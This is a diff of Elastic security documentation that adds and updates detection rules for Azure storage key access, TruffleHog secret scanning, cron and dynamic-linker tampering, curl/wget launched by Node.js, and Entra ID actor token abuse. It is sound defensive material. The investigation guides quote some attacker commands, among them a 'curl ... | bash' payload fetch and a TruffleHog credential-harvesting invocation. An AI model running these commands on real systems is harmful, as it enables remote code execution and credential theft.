+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies a rotation to storage account access keys in Azure. Regenerating acce * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -110,6 +110,22 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: TA0006 ** Reference URL: https://attack.mitre.org/tactics/TA0006/ * Technique: -** Name: Steal Application Access Token -** ID: T1528 -** Reference URL: https://attack.mitre.org/techniques/T1528/ +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc new file mode 100644 index 0000000000..6e961d6014 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc @@ -0,0 +1,139 @@ +[[azure-storage-account-keys-accessed-by-privileged-user]] +=== Azure Storage Account Keys Accessed by Privileged User + +Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Azure Activity Logs +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure Storage Account Keys Accessed by Privileged User* + + +Azure Storage Account keys provide full administrative access to storage resources. While legitimate administrators may occasionally need to access these keys, Microsoft recommends using more granular access methods like Shared Access Signatures (SAS) or Azure AD authentication. This detection identifies when users with high-privilege roles (Owner, Contributor, Storage Account Contributor, or User Access Administrator) access storage account keys, particularly focusing on unusual patterns that may indicate compromise. This technique was notably observed in STORM-0501 ransomware campaigns where compromised identities retrieved keys for unauthorized storage operations. + + +*Possible investigation steps* + + +- Review the `azure.activitylogs.identity.authorization.evidence.principal_id` to identify the specific user who accessed the storage account keys. +- Examine the `azure.resource.name` field to determine which storage account's keys were accessed and assess the sensitivity of data stored there. +- Check the `azure.activitylogs.identity.authorization.evidence.role` to confirm the user's assigned role and whether this level of access is justified for their job function. +- Investigate the timing and frequency of the key access event - multiple key retrievals in a short timeframe may indicate automated exfiltration attempts. +- Review the source IP address and geographic location of the access request to identify any anomalous access patterns or locations. +- Correlate this event with other activities by the same principal ID, looking for patterns such as permission escalations, unusual data access, or configuration changes. +- Check Azure AD sign-in logs for the user around the same timeframe to identify any suspicious authentication events or MFA bypasses. +- Examine subsequent storage account activities to determine if the retrieved keys were used for data access, modification, or exfiltration. + + +*False positive analysis* + + +- DevOps and infrastructure teams may legitimately access storage keys during deployment or migration activities. Document these planned activities and consider creating exceptions for specific time windows. +- Emergency troubleshooting scenarios may require administrators to retrieve storage keys. Establish a process for documenting these emergency accesses and review them regularly. +- Automated backup or disaster recovery systems might use high-privilege service accounts that occasionally need key access. Consider using managed identities or service principals with more restricted permissions instead. +- Legacy applications that haven't been migrated to use SAS tokens or Azure AD authentication may still require key-based access. Plan to modernize these applications and track them as exceptions in the meantime. +- New storage account provisioning by administrators will often include initial key retrieval. Consider the age of the storage account when evaluating the risk level. + + +*Response and remediation* + + +- Immediately rotate the storage account keys that were accessed using Azure Portal or Azure CLI. +- Review all recent activities on the affected storage account to identify any unauthorized data access, modification, or exfiltration attempts. +- If unauthorized access is confirmed, disable the compromised user account and initiate password reset procedures. +- Audit all storage accounts accessible by the compromised identity and rotate keys for any accounts that may have been accessed. +- Implement Entra ID authentication or SAS tokens for applications currently using storage account keys to reduce future risk. +- Configure Azure Policy to restrict the listKeys operation to specific roles or require additional approval workflows. +- Review and potentially restrict the assignment of high-privilege roles like Owner and Contributor, following the principle of least privilege. +- Enable diagnostic logging for all storage accounts to maintain detailed audit trails of access and operations. +- Consider implementing Privileged Identity Management (PIM) for just-in-time access to high-privilege roles that can list storage keys. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +azure.activitylogs.operation_name: "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION" and +azure.activitylogs.identity.authorization.evidence.principal_type: "User" and +azure.activitylogs.identity.authorization.evidence.role: ( + "Owner" or + "Contributor" or + "Storage Account Contributor" or + "User Access Administrator" +) and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/credential-access-via-trufflehog-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/credential-access-via-trufflehog-execution.asciidoc new file mode 100644 index 0000000000..c50938ffb7 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/credential-access-via-trufflehog-execution.asciidoc @@ -0,0 +1,114 @@ +[[credential-access-via-trufflehog-execution]] +=== Credential Access via TruffleHog Execution + +This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Credential Access via TruffleHog Execution* + + +This rule flags TruffleHog executed to scan the local filesystem with verified JSON results, a direct path to harvesting secrets from source code, configs, and build artifacts. Attackers gain shell access on a developer workstation or CI runner, clone or point to internal repositories, run 'trufflehog --results=verified --json filesystem .' to enumerate valid tokens, and then pivot using the recovered keys to pull private code or authenticate to cloud and CI/CD systems. + + +*Possible investigation steps* + + +- Review binary path, code signature/hash, parent process chain, initiating user, and host role (developer workstation vs CI runner) to quickly decide if the execution matches an approved secret-scanning job or an ad‑hoc run. +- Determine the working directory and target path used by the scan to identify which repositories or configuration directories were inspected and whether sensitive files (e.g., .env, deployment keys, build secrets) were in scope. +- Pivot to same-session activity to spot credential use or exfiltration by correlating subsequent outbound connections to git remotes or cloud/CI APIs and launches of developer CLIs like git, gh, aws, az, gcloud, docker, kubectl, or vault. +- Look for output artifacts and exfil channels by checking for creation or deletion of JSON reports or archives, clipboard access, or piping of results to curl/wget/netcat and whether those artifacts were emailed or uploaded externally. +- Cross-check VCS and CI/CD audit logs for this identity and host for unusual pushes, pipeline changes, or new tokens issued shortly after the scan, which may indicate worm-like propagation or credential abuse. + + +*False positive analysis* + + +- An approved secret-scanning task by a developer or security engineer runs trufflehog with --results=verified --json filesystem to audit local code and configuration, producing benign activity on a development host. +- An internal automation or scheduled job invokes trufflehog to baseline filesystem secrets for compliance or hygiene checks, leading to expected process-start logs without credential abuse. + + +*Response and remediation* + + +- Immediately isolate the host or CI runner, terminate the trufflehog process and its parent shell/script, and block egress to git remotes and cloud APIs from that asset. +- Collect the verified findings from trufflehog output (stdout or JSON file), revoke and rotate any listed secrets (GitHub personal access tokens, AWS access keys, Azure service principal credentials, CI job tokens), and clear credential caches on the host. +- Remove unauthorized trufflehog binaries/packages, helper scripts, and scheduled tasks; delete report files and scanned working directories (local repo clones, .env/config folders), and purge shell history containing exfil commands like curl/wget/netcat. +- Restore the workstation or runner from a known-good image if tampering is suspected, re-enroll endpoint protection, reissue required developer or CI credentials with least privilege, and validate normal pulls to internal git and cloud services. +- Escalate to full incident response if trufflehog ran under a service account, on a build server/CI runner, or if any discovered secret was used to authenticate to external git remotes (e.g., github.com), cloud APIs, or private registries in the same session. +- Harden by blocking unapproved trufflehog execution via application control, moving approved secret scanning to a locked-down pipeline, enforcing short-lived PATs and key rotation, enabling egress filtering from developer hosts/runners, and deploying fleet-wide detections for "trufflehog --results=verified --json filesystem". + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and process.name : ("trufflehog.exe", "trufflehog") and +process.args == "--results=verified" and process.args == "--json" and process.args == "filesystem" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ diff --git a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc index a18ca023fc..a2ca28768f 100644 --- a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc @@ -35,7 +35,7 @@ This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 17 +*Version*: 18 *Rule authors*: @@ -187,13 +187,15 @@ event.action in ("rename", "creation") and file.path : ( "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", "/bin/pamac-daemon", "/usr/local/bin/dockerd", "/opt/elasticbeanstalk/bin/platform-engine", "/opt/puppetlabs/puppet/bin/ruby", "/usr/libexec/platform-python", "/opt/imunify360/venv/bin/python3", - "/opt/eset/efs/lib/utild", "/usr/sbin/anacron", "/usr/bin/podman", "/kaniko/kaniko-executor" + "/opt/eset/efs/lib/utild", "/usr/sbin/anacron", "/usr/bin/podman", "/kaniko/kaniko-executor", + "/usr/bin/pvedaemon", "./usr/bin/podman", "/usr/lib/systemd/systemd" ) or file.path like ("/var/spool/cron/crontabs/tmp.*", "/etc/cron.d/jumpcloud-updater") or file.extension in ("swp", "swpx", "swx", "dpkg-remove") or file.Ext.original.extension == "dpkg-new" or process.executable : ( - "/nix/store/*", "/var/lib/dpkg/*", "/tmp/vmis.*", "/snap/*", "/dev/fd/*", "/usr/libexec/platform-python*" + "/nix/store/*", "/var/lib/dpkg/*", "/tmp/vmis.*", "/snap/*", "/dev/fd/*", "/usr/libexec/platform-python*", + "/var/lib/waagent/Microsoft*" ) or process.executable == null or process.name in ( @@ -201,7 +203,8 @@ event.action in ("rename", "creation") and file.path : ( "jumpcloud-agent", "crio", "dnf_install", "utild" ) or (process.name == "sed" and file.name : "sed*") or - (process.name == "perl" and file.name : "e2scrub_all.tmp*") + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name in ("vi", "vim") and file.name like "*~") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/curl-or-wget-spawned-via-node-js.asciidoc b/docs/detections/prebuilt-rules/rule-details/curl-or-wget-spawned-via-node-js.asciidoc new file mode 100644 index 0000000000..b82d344140 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/curl-or-wget-spawned-via-node-js.asciidoc @@ -0,0 +1,153 @@ +[[curl-or-wget-spawned-via-node-js]] +=== Curl or Wget Spawned via Node.js + +This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Curl or Wget Spawned via Node.js* + + +This rule flags Node.js launching curl or wget, directly or via a shell, a common technique to fetch payloads and enable command-and-control. Attackers often abuse child_process in Node apps to run "curl -sL http://host/payload.sh | bash," pulling a second stage from a remote host and executing it immediately under the guise of legitimate application activity. + + +*Possible investigation steps* + + +- Pull the full process tree and command line to extract URLs/domains, flags (e.g., -sL, -O, --insecure), and identify whether the output is piped into an interpreter, indicating immediate execution risk. +- Correlate with file system activity to find newly created or modified artifacts (e.g., in /tmp, /var/tmp, /dev/shm, or the app directory), then hash and scan them and check for follow-on executions. +- Pivot to network telemetry to enumerate connections around the event from both Node.js and the child process, assessing destination reputation (IP/domain, ASN, geo, cert/SNI) against approved update endpoints. +- Trace the initiating Node.js code path and deployment (child_process usage such as exec/spawn/execFile), and review package.json lifecycle scripts and recent npm installs or postinstall hooks for unauthorized download logic. +- Verify user and runtime context (service account/container/pod), inspect environment variables like HTTP(S)_PROXY/NO_PROXY, and check whether credentials or tokens were passed to curl/wget to assess exposure. + + +*False positive analysis* + + +- A legitimate Node.js service executes curl or wget to retrieve configuration files, certificates, or perform health checks against approved endpoints during startup or routine operation. +- Node.js install or maintenance scripts use a shell with -c to run curl or wget and download application assets or updates, triggering the rule even though this aligns with expected deployment workflows. + + +*Response and remediation* + + +- Immediately isolate the affected host or container, stop the Node.js service that invoked curl/wget (and any parent shell), terminate those processes, and block the exact URLs/domains/IPs observed in the command line and active connections. +- Quarantine and remove any artifacts dropped by the downloader (e.g., files in /tmp, /var/tmp, /dev/shm or paths specified by -O), delete added cron/systemd entries referencing those files, and revoke API tokens or credentials exposed in the command line or headers. +- Escalate to full incident response if output was piped to an interpreter (curl ... | bash or wget ... | sh), if --insecure/-k or self-signed endpoints were used, if unknown external infrastructure was contacted, or if secrets were accessed or exfiltrated. +- Rebuild and redeploy the workload from a known-good image, remove the malicious child_process code path from the Node.js application, restore validated configs/data, rotate any keys or tokens used by that service, and verify no further curl/wget spawns occur post-recovery. +- Harden by removing curl/wget from runtime images where not required, enforcing egress allowlists for the service, constraining execution with AppArmor/SELinux/seccomp and least-privilege service accounts, and adding CI/CD checks to block package.json postinstall scripts or code that shells out to downloaders. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and ( + ( + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.args == "-c" and process.command_line like~ ("*curl*", "*wget*") + ) or + ( + process.name in ("curl", "wget") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc index 4905f15431..c69a1bd91b 100644 --- a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc @@ -1,7 +1,7 @@ [[dynamic-linker-creation-or-modification]] === Dynamic Linker Creation or Modification -Detects the creation or modification of files related to the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. +Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. *Rule type*: eql @@ -31,7 +31,7 @@ Detects the creation or modification of files related to the dynamic linker on L * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -140,22 +140,27 @@ not ( "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", - "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/usr/bin/pamac-daemon", "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", - "/usr/lib/snapd/snap-update-ns", "/usr/bin/vmware-config-tools.pl" + "/usr/lib/snapd/snap-update-ns", "/usr/bin/vmware-config-tools.pl", "./usr/bin/podman", "/bin/nvidia-cdi-hook", + "/usr/lib/dracut/dracut-install", "./usr/bin/nvidia-cdi-hook", "/.envbuilder/bin/envbuilder", "/usr/bin/buildah", + "/usr/sbin/dnf", "/usr/bin/pamac", "/sbin/pacman", "/usr/bin/crio", "/usr/sbin/yum-cron" ) or file.extension in ("swp", "swpx", "swx", "dpkg-remove") or file.Ext.original.extension == "dpkg-new" or process.executable : ( - "/nix/store/*", "/var/lib/dpkg/*", "/snap/*", "/dev/fd/*", "/usr/lib/virtualbox/*", "/opt/dynatrace/oneagent/*" + "/nix/store/*", "/var/lib/dpkg/*", "/snap/*", "/dev/fd/*", "/usr/lib/virtualbox/*", "/opt/dynatrace/oneagent/*", + "/usr/libexec/platform-python*" ) or process.executable == null or process.name in ( "java", "executor", "ssm-agent-worker", "packagekitd", "crio", "dockerd-entrypoint.sh", - "docker-init", "BootTimeChecker" + "docker-init", "BootTimeChecker", "dockerd (deleted)", "dockerd" ) or (process.name == "sed" and file.name : "sed*") or - (process.name == "perl" and file.name : "e2scrub_all.tmp*") + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name == "init" and file.name == "ld.wsl.conf") or + (process.name == "sshd" and file.extension == "dpkg-new") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc index e618e2f27a..e2b44781e4 100644 --- a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc @@ -1,7 +1,7 @@ [[dynamic-linker-ld-so-creation]] === Dynamic Linker (ld.so) Creation -This rule detects the creation of the dynamic linker (ld.so) file. The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. +This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. *Rule type*: eql @@ -11,9 +11,9 @@ This rule detects the creation of the dynamic linker (ld.so) file. The dynamic l * logs-sentinel_one_cloud_funnel.* * endgame-* -*Severity*: low +*Severity*: medium -*Risk score*: 21 +*Risk score*: 47 *Runs every*: 5m @@ -36,7 +36,7 @@ This rule detects the creation of the dynamic linker (ld.so) file. The dynamic l * Data Source: Elastic Endgame * Resources: Investigation Guide -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -139,7 +139,18 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ ---------------------------------- file where host.os.type == "linux" and event.type == "creation" and process.executable != null and file.path like~ ("/lib/ld-linux*.so*", "/lib64/ld-linux*.so*", "/usr/lib/ld-linux*.so*", "/usr/lib64/ld-linux*.so*") and -not process.name in ("dockerd", "yum", "dnf", "microdnf", "pacman") +not process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", + "/usr/lib/snapd/snap-update-ns", "./usr/bin/podman", "/usr/bin/crio", "/usr/bin/buildah", "/bin/dnf5", + "/usr/bin/dnf5", "/usr/bin/pamac" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc new file mode 100644 index 0000000000..7ed41ef4cd --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc @@ -0,0 +1,141 @@ +[[entra-id-actor-token-user-impersonation-abuse]] +=== Entra ID Actor Token User Impersonation Abuse + +Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/ +* https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55241 + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Actor Token User Impersonation Abuse* + + +This rule detects when Microsoft services use actor tokens to perform operations in audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) communication. They appear with a mismatch: the service's display name but the impersonated user's UPN. While some operations legitimately use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed attackers to obtain Global Admin privileges across any Entra ID tenant. Note that this vulnerability has been patched by Microsoft as of September 2025. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify which service principals are exhibiting this behavior. +- Check the `azure.auditlogs.properties.initiated_by.user.displayName` to confirm these are legitimate Microsoft services. +- Analyze the actions performed by these service principals - look for privilege escalations, permission grants, or unusual administrative operations. +- Review the timing and frequency of these events to identify potential attack patterns or automated exploitation. +- Cross-reference with recent administrative changes or service configurations that might explain legitimate use cases. +- Check if any new applications or service principals were registered recently that could be related to this activity. +- Investigate any correlation with other suspicious authentication events or privilege escalation attempts in your tenant. + + +*False positive analysis* + + +- Legitimate Microsoft service migrations or updates may temporarily exhibit this behavior. +- Third-party integrations using Microsoft Graph or other APIs might trigger this pattern during normal operations. +- Automated administrative tools or scripts using service principal authentication could be misconfigured. + + +*Response and remediation* + + +- Immediately review and audit all service principal permissions and recent consent grants in your Entra ID tenant. +- Disable or restrict any suspicious service principals exhibiting this behavior until verified. +- Review and revoke any unnecessary application permissions, especially those with high privileges. +- Enable and review Entra ID audit logs for any permission grants or role assignments made by these service principals. +- Implement Conditional Access policies to restrict service principal authentication from unexpected locations or conditions. +- Enable Entra ID Identity Protection to detect and respond to risky service principal behaviors. +- Review and harden application consent policies to prevent unauthorized service principal registrations. +- Consider implementing privileged identity management (PIM) for service principal role assignments. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.auditlogs-* metadata _id, _version, _index +| where azure.auditlogs.properties.initiated_by.user.displayName in ( + "Office 365 Exchange Online", + "Skype for Business Online", + "Dataverse", + "Office 365 SharePoint Online", + "Microsoft Dynamics ERP" + ) and + not azure.auditlogs.operation_name like "*group*" and + azure.auditlogs.operation_name != "Set directory feature on tenant" + and azure.auditlogs.properties.initiated_by.user.userPrincipalName rlike ".+@[A-Za-z0-9.]+\\.[A-Za-z]{2,}" +| keep + _id, + @timestamp, + azure.*, + client.*, + event.*, + source.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** 